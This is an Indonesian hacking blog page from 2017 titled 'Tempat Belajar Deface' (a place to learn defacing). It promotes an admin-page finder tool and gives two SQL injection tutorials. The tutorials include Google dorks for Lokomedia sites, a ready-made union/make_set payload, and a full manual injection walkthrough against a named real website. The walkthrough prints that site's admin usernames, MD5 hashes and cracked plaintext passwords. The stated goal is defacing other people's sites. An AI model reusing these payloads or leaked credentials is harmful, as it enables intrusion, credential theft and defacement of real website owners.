05/22/17 - Defa Squad

Tempat Belajar Deface

Post Top Ad

Monday, May 22, 2017

Tool : Ofline Page admin finder

May 22, 2017 0
Admin Finder Login - family attack cyber
credit : blackbekasi

penampakannya :v



update url page login 2017
bisa di tambah lagi dengan cara menuliskan di admin.txt

silahkan download    >>>>  disini

dan dapatkan tool hacking dan deface lainnya di sini

tag : tool admin finder , admin finder offline , cara mencari tepat admin login , Tool deface ,
Read More

Tutorial Deface : Sql Lokomedia

May 22, 2017 2

Bahan :

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html

   Kembangin lagi biar dapet yg VULN + Perawan :p

2. Exploit

    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

   Gatau caranya? :v Sini gw ajarin :p

   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.




5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

Untuk password masih berbentuk hash MD5, bisa kalian hash disini,

6. Tinggal cari admin page nya. Biasanya sih di:

http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

kalau gak dapat bisa pake tool admin finder download disini

cukup sampe sini ya tutorial saya , makasih dah baca post saya kali ini
jangan lupa shere ya :)


Tag : Sql lokomedia , belajar deface dengan teknik lokomedia ,
Read More

Tutorial Deface : Sql Injection Manual ( tampa tools )

May 22, 2017 1
Pengertian SQL Injection


SQLI atau Sqli injection adalah suatu teknik hacking yang di gunakan oleh penyerang/attacker untuk mendapatkan sebuah database dengan menyisipkan perintah - perintah SQL melalui url yang memanfaatkan bug yang disebabkan oleh kesalahan coding atau kurang pemfilteran variabel

Bagaimana cara mengetahui web tersebut vuln sqli?

Untuk mengetahui web tersebut vuln sqli atau terkena celah sqli adalah dengan cara membuat error url tersebut, dengan menambahkan karakter (') pada id di akhir url, 
contoh: target.com/index.php?id=sql'
            target.com/index.php?id=1'

Langsung saja ke tutorialnya.



Tutorial

Pertama-tama kita cari target dengan dork, anggap saja kalian udah pada mengerti, ini saya kasih contoh dork, kalian kembangin lagi sendiri.

inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

Dan saya sudah punya target www.mywaymedia.it/readMore.php?id=15

Selanjutnya kita coba test web tersebut vuln atau tidak dengan menambahkan karakter (') , maka jadinya seperti ini www.mywaymedia.it/readMore.php?id=15'

Tutorial deface dengan SQLI manual
Dan ternyata error  

Notice: Use of undefined constant Errore - assumed 'Errore' in /var/www/www.mywaymedia.it/readMore.php on line 15 ErroreYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Untuk error website berbeda-beda

Berikut contoh-contoh error pada web yang terkena celah SQL Injection
  • You have an error in your SQL syntax;
  • Warning: mysql_fetch_array()
  • Warning: mysql_num_rows()
namu jika kalian masih kesusahan mencari web yang vunl sqli dengan dork di atas , coba menggunakan tool exploit scanner ( gr3enox ) disini untuk mencari web yang vunl

Dan masih banyak lagi, bukan hanya error aja, web blank atau ada data yg hilang itu juga tanda vuln,
Disini saya akan menggunakan add ons hakbar untuk mempermudah menginjeksinya, yang belum punya bisa pasang disini,
Kalau sudah untuk menampilkan hakbar tekan F9,
Lanjut menginjeksi
Sekarang kita akan mencari berapa jumlah column database site itu dengan menambahkan perintah order by, tambahkan + untuk spasi, jadi perintahnya seperti ini 
www.mywaymedia.it/readMore.php?id=15+order+by+1--

Lalu klik Execute Nanti web akan kembali normal, 
Tutorial deface dengan SQLI manual
lalu ganti angka 1 ke angka 2 dan seterusnya sampai ketemu error lagi agar lebih jelas lihat gambar dibawah
Disini saya menemukan errornya di order+by +5--
Tutorial deface dengan SQLI manual
Berati kita sudah menemukan jumlah column database 4, loh kok 4? sedangkan disitu errornya di 5,
Begini saya jelaskan, setelah kita memasukan perintah order by 1 sampe 4 tidak ada error dan errornya di angka 5 secara logika berati di column 5 tidak ada di database site tersebut, jadi column database cuma sampe 4 aja, kurang lebih begitu.
Lanjut.
Selanjutnya kita masukan perintah union select, ganti order by dengan +union+select+1,2,3,4-- dan sebelum angka di belakang url tersebut tambahkan tanda (-), maksud 1,2,3,4 itu adalah angka column tadi,
Maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,3,4--

maka nanti kita akan mendapatkan sebuah angka, disini saya mendaptkan angka 3 dan 4,
Tutorial deface dengan SQLI manual 
Kedua angka itu sebenarnya sama, kita pilih salah 1, saya memilih angka 3 untuk tahap selajutnya,
Sekarang kita lihat berapa version database site tersebut, ganti angka 3 di union select tadi dengan perintah @@version , maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,@@version,4--

Tutorial deface dengan SQLI manual

Nah kita tau version database tersebut 5.1.73 berati bisa kita lanjut, karena version 4 agak rumit, tapi rata-rata version 5 keatas,

Selanjutnya @@version kita ganti dengan perintah group_concat(table_name) dan di akhir angka sebelum tanda -- tadi masukan perintah from+information_schema.tables+where+table_schema=database()
Maka perintahnya seperti berikut.
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Maka nanti kita akan mendapatkan nama-nama table di database tersebut

Tutorial deface dengan SQLI manual
Disini saya mendapatkan nama-nama table news,news_utf,tbl_users

Karena kita disini tujuanya deface berati kita mencari user dan password admin, berati kita cari table yang kemungkinan itu table admin, seperti admin dll,
disini saya mendapatkan table tbl_users 
Selanjutnya kita ganti group_concat(table_name) menjadi group_concat(column_name) dan from+information_schema.tables+where+table_schema= menjadi from+information_schema.columns+where+table_name= kemudian database() kita ganti dengan table tbl_users yang sudah kita rubah dengan decimal, mengubah decimal bisa mengunakan tools disini atau bisa langsung menggunakan hakbar.

kalau saya disini langsung menggunakan hakbar, caranya dengan cara klik SQL > MySQL > MySQL CHAR(), selanjutnya masukan nama table, maka akan jadi seperti berikut CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)--
Maka nanti kita akan mendapatkan nama-nama isi di table tbl_users,
Disini saya mendapatkan nama-nama table user_id,user_name,user_pass,user_lastaccess


Tutorial deface dengan SQLI manual

Disini sudah terlihat nama table user_name dan user_pass berati langkah selajutnya melihat datanya

Ganti group_concat(column_name) menjadi group_concat(user_name,0x3a,user_pass) untuk 0x3a itu decimal dari tanda (:)
Dan ganti from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115) menjadi from+tbl_users
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php ?id=-15+union+select+1,2,group_concat(user_name,0x3a,user_pass),4+from+tbl_users--


Tutorial deface dengan SQLI manual

Dan kita sudah mendapatkan username dan password site tersebut
publishing@vivacom.com:67e84f9ebb0d4a3f782d61edc9a91528
myway:a17e60c21d70e8d576e4d1dfce3ba1f8 

User: publishing@vivacom.com
Password:  67e84f9ebb0d4a3f782d61edc9a91528
dan
User: myway
Password:  a17e60c21d70e8d576e4d1dfce3ba1f8

Untuk password masih berbentuk hash MD5, bisa kalian hash disini,

Tutorial deface dengan SQLI manual
Maka akan muncul password aslinya 

67e84f9ebb0d4a3f782d61edc9a91528 MD5 : 190773_v
a17e60c21d70e8d576e4d1dfce3ba1f8 MD5 : 12MMant


Maka hasilnya seperti berikut

User:  publishing@vivacom.com
Password: 190773_v
dan
User:  myway
Password:  12MMant

sumber: http://www.idiot-attacker.com/

sekarang tinggal cari tempat loginya , kalau ente kesusahan ane punya toolnya kok , klick disini 
Tag : tutorial deface sql injection , pengertian sql injection , belajar deface dengan sql injection tampa tool , apa itu sql , tutorial deface , sql ,cara sqli manual, tutorial sqli, tutorial sqli manual, tutorial hakbar, tutorial deface, sqli,
Read More

Post Top Ad